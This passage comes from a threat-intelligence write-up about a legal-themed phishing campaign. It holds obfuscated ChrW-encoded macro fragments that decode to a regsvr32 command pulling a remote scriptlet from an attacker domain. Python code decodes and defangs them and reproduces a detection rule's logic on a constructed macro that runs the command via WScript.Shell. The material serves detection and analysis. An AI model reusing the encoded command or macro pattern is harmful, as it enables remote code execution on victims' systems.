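    "ChrW(120) & ChrW(101) & ChrW(32) & ChrW(47) & ChrW(115) & ChrW(32) & ChrW(47) & ChrW(110) & ChrW(32) & ChrW(47)",
    "ChrW(117) & ChrW(32) & ChrW(47) & ChrW(105) & ChrW(58) & ChrW(104) & ChrW(116) & ChrW(116) & ChrW(112) & ChrW(115)",
    "ChrW(58) & ChrW(47) & ChrW(47) & ChrW(108) & ChrW(121) & ChrW(110) & ChrW(99) & ChrW(100) & ChrW(105) & ChrW(115)",
    "ChrW(99) & ChrW(111) & ChrW(118) & ChrW(101) & ChrW(114) & ChrW(46) & ChrW(50) & ChrW(98) & ChrW(117) & ChrW(110)",
    "ChrW(110) & ChrW(121) & ChrW(46) & ChrW(99) & ChrW(111) & ChrW(109) & ChrW(47) & ChrW(65) & ChrW(117) & ChrW(116)",
    "ChrW(111) & ChrW(100) & ChrW(105) & ChrW(115) & ChrW(99) & ChrW(111) & ChrW(118) & ChrW(101) & ChrW(114) & ChrW(32)",
    "ChrW(115) & ChrW(99) & ChrW(114) & ChrW(111) & ChrW(98) & ChrW(106) & ChrW(46) & ChrW(100) & ChrW(108) & ChrW(108)",
]


def decode_chrw(expr: str) -> str:
    """Rebuild the text that a ChrW(n) & ChrW(n) chain concatenates at run time."""
    return "".join(chr(int(n)) for n in CHRW_RE.findall(expr))


def defang(text: str) -> str:
    """Make recovered URLs non-clickable for reporting (http -> hxxp)."""
    return text.replace("http", "hxxp")


def triage_macro(macro_text: str) -> dict:
    """Python approximation of the FE_LEGALSTRIKE_MACRO condition: not a PE file,
    both WScript.Shell strings present, and either 3+ $ob fragments or a long
    ChrW chain (the $obreg2 regex). Also returns the decoded, defanged fragments."""
    wsobj = ('Set Obj = CreateObject("WScript.Shell")', "Obj.Run ")
    chain = re.compile(r"(ChrW\(\d{1,3}\)\s&\s){7}")
    ob_hits = [f for f in OB_FRAGMENTS if f in macro_text]
    not_pe = not macro_text.startswith("MZ")
    ws_ok = all(s in macro_text for s in wsobj)
    matched = not_pe and ws_ok and (len(ob_hits) >= 3 or chain.search(macro_text) is not None)
    return {"matched": matched, "decoded": defang("".join(decode_chrw(f) for f in ob_hits))}


# Constructed sample macro body (not a real sample) splicing the first three fragments.
SAMPLE_MACRO = (
    'Set Obj = CreateObject("WScript.Shell")\n'
    "cmd = " + " & ".join(OB_FRAGMENTS[:3]) + "\n"
    "Obj.Run cmd, 0\n"
)

if __name__ == "__main__":
    print(defang("".join(decode_chrw(f) for f in OB_FRAGMENTS)))
    print(triage_macro(SAMPLE_MACRO))
```

Decoding all eight fragments yields the defanged regsvr32 command from the indicator list above; a PE file (MZ header) or a macro without the WScript.Shell strings is not flagged, mirroring the rule's condition.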
Acknowledgements
Joshua Kim, Nick Carr, Gerry Stellatos, Charles Carmakal, TJ Dahms, Nick Richard, Barry Vengerik, Justin Prosco, Christopher Glyer
Go to Source. Original post from FireEye, author: Ian Ahl. Title: Privileges and Credentials: Phished at the Request of Counsel.